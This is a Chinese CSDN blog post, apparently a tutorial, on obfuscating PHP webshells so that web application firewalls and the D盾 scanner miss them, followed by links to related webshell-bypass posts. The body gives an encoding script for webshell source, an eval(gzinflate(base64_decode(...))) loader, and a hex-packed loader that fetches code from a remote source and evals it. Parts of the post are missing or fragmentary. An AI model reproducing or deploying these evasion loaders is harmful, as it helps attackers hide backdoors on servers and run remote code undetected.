php超小免杀大马_php大马免杀技巧 | bypass waf

最新推荐文章于 2024-04-02 13:01:55 发布
最新推荐文章于 2024-04-02 13:01:55 发布
阅读量336 收藏
点赞数
文章标签: php超小免杀大马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39885166/article/details/111743662
版权

Part 1 前言

Part 2 免杀

执行代码

eval 或 preg_replace的/e修饰符来执行大马代码。

$a = 'phpinfo();';eval($a);//eval执行php代码

编码

如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。

eval_gzinflate_base64类型加密与解密:

http://www.zhuisu.net/tool/phpencode.php

https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php

自己写脚本加密:

$code= file_get_contents('D:\phpStudy\WWW\Test\Zlib\help.txt'); //大马源码路径

$encode = base64_encode(gzdeflate($code)); //加密函数自己修改就行

echo $encode; //输出加密后代码

解码

通过解码执行我们的代码。

eval(gzinflate(base64_decode('S03OyFdQ8shUKLbMTVOyBgA=')));?>

关键字免杀

//类型这样的关键字如果没有混淆拆分是过不了waf的

eval(gzinflate(base64_decode

//我们需要做的就是关键字免杀

免杀 payload

D盾

查杀

免杀远程执行 payload

$f = file_get_contents(PACK('H*',$$m));eval($f);

?>

免杀

远程下载 payload

免杀,D盾报了1级,可以完全免杀的,但是觉得没必要。

Part 3 总结

weixin_39885166
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防演练中PHP大马分析实战_afei00123
afei001
07-10 860
在一次HVV行动中,在某天眼设备上发现红队在尝试通过命令执行下载了一个可疑的txt文件。该文件经分析是一个不错的PHP大马
php-webshell大马(功能齐全)
10-28
php小马 详细的资源以后我会推荐 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。
PHP大马】定义、下载、使用、源码
热门推荐
06-01 2万+
PHP大马】适合第一次接触的
冰蝎php马静态
最新发布
qq_61807674的博客
04-02 1003
其实还有小马哥的腾讯哈勃,但是那个不支持上传webshell,上传压缩包虽然行,但是如果压缩一遍了连冰蝎原马都查不出来,就当图一乐了,就不放出来了.....大部分云沙箱和在线查我都基本试过了,基本除了安恒云沙箱都能稳过(ah一生之敌),因为我的测试环境是php7.3往上了,没法用assert拼接执行,估计是检测到了eval执行字符串代码,所以静态检测没过,太丢脸就不放截图啦,师傅们可以按着自己的想法改改试试()但是也正常,只是做了基础的静态而已,其实处理还是不够到位的,心态要端正,很不错了!
过D盾php webshell马探讨
goddemon
07-19 1607
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结在这个过程中发觉了其实webshell的bypass手法还是蛮多的后缀bypass总结完了经过实战也绕过了很多家最新的waf后缀内容的还没写完东西有点多这里就分享一些php的马全过的也有贼多但是暂时就不分享了。......
new.bypass_bypass_NEW__webshell_phpwebshell_
10-03
webshell
bypass_360_meterpreter技巧1
08-03
1. -w # 隐藏控制台窗口窗口的应用程序 3. -d # 不编码PHP文件 4. dll # 嵌入和使用PHP扩展 1. bamcompile.exe -w
Bypass_WAF_技巧分享.pdf
08-08
WAF 简介 • WAF 分类 • WAF 识别 • WAF 绕过方式 • Bypass 利用
WAF_Bypass_技术讨论.pdf
08-08
一、WAF分类及原理解析 二、WAF指纹识别及探测 三、WAF Bypass姿势
360webscan.php_bypass.pdf
03-18
360webscan.php_bypass
PHP大马 源码
04-18
PHP大马 源码
PHP大马后门分析
qq_17754023的博客
02-28 3870
PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。 分析大马文件 打开下载的php大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有后门 从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
php大马_PHP大马的奇淫技巧
weixin_34150870的博客
02-28 2631
本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!Part 1 Part 2大马后门检查: Fiddler 抓包 审计代码修改并运行脚本 Burp 抓包或者右键查看原代码 修改并运行代码 再使用 Burp 抓个包 查找关键字 GetHtml hmlogin localhost 等 把上图的 base64 代码解密下 Part 3大马源码这里我使用的是国外的一款大...
Php309,GitHub - xiaoq190309/S9MF-php-webshell-bypass: 为方便WAF入库的项目 | 分享PHP大马 | 菜是原罪 | 多姿势(假的就一个)...
weixin_30999669的博客
03-22 420
S9MF-php-webshell-bypass为方便WAF入库的项目 | 分享PHP大马 | 菜是原罪 | 多姿势(假的就一个)前言webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。又分大马和小马,大马就是功能比较多的,而小马更像一句话,本文介绍的是PHP大马。声明项目脚本仅供学习交流请勿用于非法用途。本文测试的...
php功能大马加密乱码,php大马加密工具 phpTrace:奇虎360开源的PHP脚”的相关知识...
weixin_39645165的博客
03-10 213
phpTrace:奇虎360开源的PHP脚本分析工具问题:phpTrace:奇虎360开源的PHP脚本分析工具回答:phpTrace是奇虎 360开源的一款和分析PHP脚本的工具。如果开发者用过strace的话,则可能很容易想到phpTrace到底实现了什么样的功能。在解释为何开发phpTrace时,项目组成员介绍说: 其实,phpTrace 是类strace 的一个实现,不同的是,strace...
分享151个PHP源码,总有一款适合您
zy0412326的专栏
01-21 1343
PHP
】————2、php木马的思路
Fly_鹏程万里
03-04 1630
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做 Webshell。 本篇文章主要探讨关于 PHP 语言的 Webshell 检测工具和平台的绕过方法,实现能够绕过以下表格中 7 个主流(基本代表安全行业内 PHP Webshell检测的一流水平)专业工具和平台检测的 PHP Webshell,构造出零提示、无警告、无法被检测到的一句...
2017php小马,PHP7.1后webshell
weixin_42177768的博客
03-11 250
严格的D盾D盾说,我是个严格的人,看到eval我就报木马,“看着像“=”就是“木马,宁可错一千,绝不放过一个。好了,多说无益,一起看看严格的D盾是如何错的。我随手写一个php文件:代码如下:function encode($para0){return$para0;}$b= encode("aaaa");$a= "ccc";eval($a);?>很明显没有传参呀,GET和POST都没有,压...
as_bypass_php_disable_functions-master
09-17
as_bypass_php_disable_functions-master是一个可以绕过PHP禁用函数的项目。 在PHP中,禁用函数是一种安全措施,用于限制脚本执行时可以调用的函数。这样可以防止恶意代码的执行,提高服务器的安全性。 然而,有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值